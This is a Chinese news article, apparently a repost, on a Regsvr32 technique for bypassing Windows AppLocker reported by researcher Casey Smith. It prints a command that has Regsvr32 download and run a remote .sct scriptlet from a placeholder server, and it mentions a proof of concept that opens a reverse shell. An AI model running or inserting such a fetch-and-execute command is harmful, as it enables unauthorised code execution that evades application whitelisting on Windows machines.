AppLocker是Windows 7和Windows Server 2008 R2中引入的一项安全功能,旨在帮助管理员们指定哪个用户或用户组能够访问/运行某一个文件。然而据外媒报道,已经有人找到了利用Windows系统中Regsvr32命令行工具的某个隐藏特性,来绕过Windows AppLocker安全措施并正常注册动态链接库(DLLs)的方法。

Regsvr32则是一款可被安装工具(或批处理脚本)使用,以便快速注册动态链接库的脚本工具。

照理说,微软既然把这款“中性”而又危险的工具留在系统中,就应该管好它不被管理员之外的人所滥用。但遗憾的是,我们几乎不可能检测到这种类型的攻击。

据安全研究人员Casey Smith所述,当攻击者在某台受感染的工作站上立足之后,就可以滥用Regsvr32、通过网络下载一个COM脚本程序(.sct文件),然后在本地机器上注册一个DLL。

更糟糕的是,攻击者甚至无需取得管理员权限。Regsvr32可借助代理和TLS连接、重定向等功能,并且它拥有微软自家的证书,所以可以执行任何看似正常的背景活动命令。

下面是标准的Regsvr32参数、以及而已命令的对比:

regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Smith还指出,“regsvr32能够接收的脚本网址没有很好的记录,要触发这一‘旁路’,可以把内置VB和JS元素的代码块放进去”。

在进一步的测试中,研究人员还在GitHub上放出了系统管理员能够下载的“概念验证脚本”(通过Regsvr32并打开一个后门、或者基于HTTP的反向shell)。

从理论上来说,这种类型的“漏洞”允许攻击者访问注册所有DLL,然后在被感染的计算机上执行恶意代码,更别说管理员权限了。

本文转自d1net(转载)

Windows AppLocker被绕过:攻击者可不提权联网注入DLL相关推荐

  1. 越过游戏服务器修改,“撬锁”实战:绕过云锁提权某游戏私服

    原标题:"撬锁"实战:绕过云锁提权某游戏私服 严正声明:本文仅限于技术讨论与分享,严禁用于非法途径. 前言 朋友给我了我一个游戏私服的shell,说是提权不下服务器,让我帮忙看看. ...

  2. 烽火狼烟丨VMware Workspace ONE Access身份验证绕过、本地提权漏洞风险提示

    1.漏洞概述 近日,WebRAY安全服务产品线监测到VMware官方发布安全公告,修复了两个存在于VMware Workspace ONE Access产品的漏洞. VMware认证绕过漏洞(CVE- ...

  3. Windows与Linux的MYSQL UDF提权分析

    原理分析 什么是UDF 所谓UDF 就是user define function的简称,就是用户自定义函数,用户可以添加函数到mysql中实现功能的扩充,调用方法和一般函数一样类似于database( ...

  4. 从 CVE-2020-1048 到 CVE-2020-17001:Windows打印机模块中多个提权漏洞分析

     聚焦源代码安全,网罗国内外最新资讯! Windows 打印组件自 Win2000时代就被引入,作为一个"历史悠久"的组件其安全问题也一直广受安全研究人员关注.近期围绕 print ...

  5. 操作系统权限提升(十五)之绕过UAC提权-基于白名单DLL劫持绕过UAC提权

    系列文章 操作系统权限提升(十二)之绕过UAC提权-Windows UAC概述 操作系统权限提升(十三)之绕过UAC提权-MSF和CS绕过UAC提权 操作系统权限提升(十四)之绕过UAC提权-基于白名 ...

  6. 系统提权之:Windows 提权

    郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...

  7. windows PR提权

    漏洞概述 Microsoft Windows RPCSS服务隔离本地权限提升漏洞 RPCSS服务没有正确地隔离 NetworkService 或 LocalService 帐号下运行的进程,本地攻击者 ...

  8. 操作系统权限提升(三)之Windows系统内核溢出漏洞提权

    系列文章 操作系统权限提升(一)之操作系统权限介绍 操作系统权限提升(二)之常见提权的环境介绍 注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!! Windows系统内核溢出漏洞提权介绍 ...

  9. Windows系统提权姿势

    windows系统提权 权限提升简介 权限提升概述 什么是提权 提权分类 提权条件 Windows提权思路 Windows系统提权 Windows提权信息收集 WMIC信息收集 自动信息收集 提权工具 ...

  10. Windows核心编程_提权

    在Windows下编程有些涉及到硬件或者跨内存的API会发现失效了,原因是因为权限问题,这也是Windows出于安全的保护,但是事物都有两面性的,Windows又为我们提供了提权的API! 1.Adj ...

最新文章

  1. Android GIF 编解码
  2. 当随机不够随机:一个在线扑克游戏的教训
  3. Shiro安全框架-简介
  4. [vue] 动态给vue的data添加一个新的属性时会发生什么?怎样解决?
  5. 【转】c#中@的3种作用
  6. 【工具与解决方案】从做项目中积累学习
  7. linux svn 拉取代码_svn快速入门指南
  8. 资中筠 - 百度百科
  9. 静态检查------SourceMonitor的学习和使用
  10. python getopt使用_如何使用getopt.getoptpython中的方法?
  11. 【随机过程】随机过程之更新过程(1)
  12. 获取指定USB设备的VID PID和SerialNumber
  13. centos查询 硬盘序列号查询_CentOS/Linux 查看硬件配置CPU内存磁盘
  14. 【表格】从1G到5G的移动通信发展历程(精简版)
  15. PowerVR 6系列架构分析
  16. 【毕业设计】python+深度学习+opencv实现植物识别算法系统
  17. android手机只有三星采用实体键,三星新配件:你终于可以体面地使用实体全键盘了...
  18. 类似obs直播工具有哪些_如何使用OBS直播职业玩家之类的游戏
  19. 〖3D激光点云〗激光雷达点云bin文件读取和显示!
  20. 手机文档怎样通过计算机打印,惠普M1218怎么使用手机打印文件?电脑与电脑之间怎么共享打印机打印?...

热门文章

  1. 《商业分析实践指南》(一)
  2. 电脑mac地址的查看的三种方式
  3. win7删除文件提示“您需要权限才能执行此操作”的3种解决办法
  4. [OpenCV实战]1 基于深度学习识别人脸性别和年龄
  5. matlab指数形式复数运算,[转载]MATLAB学习(4)——复数及其运算
  6. java font好看的字体_解决Java字体难看的问题
  7. bootStrap3 垂直居中
  8. gb28181协议流媒体实现为rtp荷载ps流,将h264流打包成ps流。
  9. 谁曾从谁的时光里停留
  10. 云台山风景美如画,四大网红打卡景点等你来!